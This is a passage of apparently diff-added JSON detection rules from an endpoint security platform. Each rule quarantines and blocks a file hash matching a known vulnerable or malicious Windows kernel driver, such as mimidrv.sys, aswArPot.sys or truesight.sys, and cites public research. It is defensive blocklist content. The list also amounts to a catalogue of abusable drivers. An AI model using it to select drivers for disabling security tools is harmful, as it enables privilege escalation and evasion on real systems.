+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983369Z",
+ "creation_date": "2026-03-23T11:45:29.983371Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983376Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "97030f3c81906334429afebbf365a89b66804ed890cd74038815ca18823d626c",
+ "comment": "Vulnerable Kernel Driver (aka kbdcap64.sys) [https://www.loldrivers.io/drivers/6a7d882b-3d9d-4334-be5f-2e29c6bf9ff8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ad0a164-fba5-55ce-b1a3-905ca6fbd8a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465511Z",
+ "creation_date": "2026-03-23T11:45:30.465515Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465523Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b34e2d9f3d4ef59cf7af18e17133a6a06509373e69e33c8eecb2e30501d0d9e4",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1aebafa2-5e96-584c-94f6-5fae7cfbfc9e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969076Z",
+ "creation_date": "2026-03-23T11:45:29.969078Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969083Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f17e5cfc5bdd74aff91bfb1a836071345ba2b5d1b47b0d5bf8e7e0d4d5e2dbf",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b099f55-0316-5967-95d4-04b2190aa9d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604374Z",
+ "creation_date": "2026-03-23T11:45:29.604376Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604381Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "761ca3aee052d4a34f500dee578ef55a4e481b1d6096eb3573f3f828ecfe4f89",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b0cd3ea-e28e-5b2a-a040-c14bf801a7e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819784Z",
+ "creation_date": "2026-03-23T11:45:31.819788Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8a2e2d3b845d658150e656153e40e6c741cdaa2627ed940e9875ca42472ba82",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b175542-d22b-5431-8403-43467b2826fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489004Z",
+ "creation_date": "2026-03-23T11:45:31.489006Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489012Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1dd2feaa9b18b3ba4187167557107e5bc331837f607e1a7adcbc7192700d1b80",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b17bc16-e852-5ee3-a3d1-e63ed949fad3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473630Z",
+ "creation_date": "2026-03-23T11:45:30.473633Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473642Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c27ad462ed0e16252b834cf0c76b1c5085ad9b7b6a13f67d1d2471177f1b177",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b2f0f9e-5f0f-57b9-9586-6a0c4076a36b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982713Z",
+ "creation_date": "2026-03-23T11:45:29.982715Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982720Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "97cada65b735f3eece349c7b7021c4469d5a9fb3cf8b5e2ac187006469ffbc98",
+ "comment": "Vulnerable Kernel Driver (aka SysDrv3S.sys) [https://www.loldrivers.io/drivers/cf49f43c-d7b4-4c1a-a40d-1be36ea64bff/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b34914b-2ad9-5fcd-90bd-828c893d5883",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830825Z",
+ "creation_date": "2026-03-23T11:45:30.830827Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830833Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "197ff39f37973f12175188c41007cb555f569a310f36ce3a613a0989385275a5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b3b66b5-4ede-5845-944e-5c0b7c153d4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145218Z",
+ "creation_date": "2026-03-23T11:45:31.145220Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145225Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "529b3ad0f683ce1d5dc236692c68f2c990aa09d816fd4d9e35a1e94a8aaf417a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b4bc9d3-46f5-5ce1-9f9e-c2000432c34b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489551Z",
+ "creation_date": "2026-03-23T11:45:31.489555Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489563Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a43eda51f8bea611289c52ca96ec4f703c895d1cba72232fe8a7388945ea6dfd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b4d7b86-08d0-55d4-9615-1e09bbcb3118",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145893Z",
+ "creation_date": "2026-03-23T11:45:31.145897Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145905Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4653fb7161bc0f5af4057778d8f9d5aa865923db472220479033448a403c007f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b61eb18-4d0c-547f-ad60-52e1234277bc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973906Z",
+ "creation_date": "2026-03-23T11:45:29.973908Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973913Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "adc10de960f40fa9f6e28449748250fa9ddfd331115b77a79809a50c606753ee",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b675bb8-aa03-5acf-8bb0-7b6f92a5f316",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817365Z",
+ "creation_date": "2026-03-23T11:45:30.817367Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817372Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ce5523dea824b2f2d4d442a9016d0f1b7cc52dce58a1740f4c43fd28e1c6dcb",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b736bdf-8e4f-5d39-9022-99852b2f46d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818066Z",
+ "creation_date": "2026-03-23T11:45:30.818068Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818074Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ef0b34649186fb98a7431b606e77ee35e755894b038755ba98e577bd51b2c72",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b7abaea-b19e-54f3-b5e0-148ad62060d2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458250Z",
+ "creation_date": "2026-03-23T11:45:30.458254Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458262Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49ef680510e3dac6979a20629d10f06822c78f45b9a62ec209b71827a526be94",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b7af6a4-bb22-5935-8d9a-c28de969b594",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622562Z",
+ "creation_date": "2026-03-23T11:45:29.622564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622569Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72c0d2d699d0440db17cb7cbbc06a253eaafd21465f14bb0fed8b85ae73153d1",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b8bdd30-526f-51da-8967-b823cc336470",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826586Z",
+ "creation_date": "2026-03-23T11:45:30.826588Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826593Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "072397e33f2bb44596c3c188a570b18628921456621b0eba8f6ba4b71035064c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b8fa0de-40b4-54fa-9223-780a6c48c933",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459460Z",
+ "creation_date": "2026-03-23T11:45:30.459463Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459472Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a0f57a4d7c8137baf24c65d542729547b876979273df7a245aaeea87280c090",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1b9adada-ebd4-5a46-b917-3049f1f02a50",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817959Z",
+ "creation_date": "2026-03-23T11:45:30.817961Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817966Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "53f2bfe03b5d74c9db8c6a849e5a4690cba9a9861dd98c204865000506d8ce67",
+ "comment": "Vulnerable Kernel Driver (aka stdcdrvws64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ba871cc-f886-537f-b30e-ec3fca2c090b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976764Z",
+ "creation_date": "2026-03-23T11:45:29.976767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db0b5c434ddc7c97505a8be24431e9fbe484c2113df4ddf061aee91c35eab8b6",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1bac03e4-bc3c-516b-af7f-bea3b49a2065",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824952Z",
+ "creation_date": "2026-03-23T11:45:30.824955Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824966Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dc22bbc782458f47244c9a2875b42f5916d87b4ca813eb20f1c88a2e444c36ac",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1baca231-cc28-54de-8e3a-daff1b35ac21",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
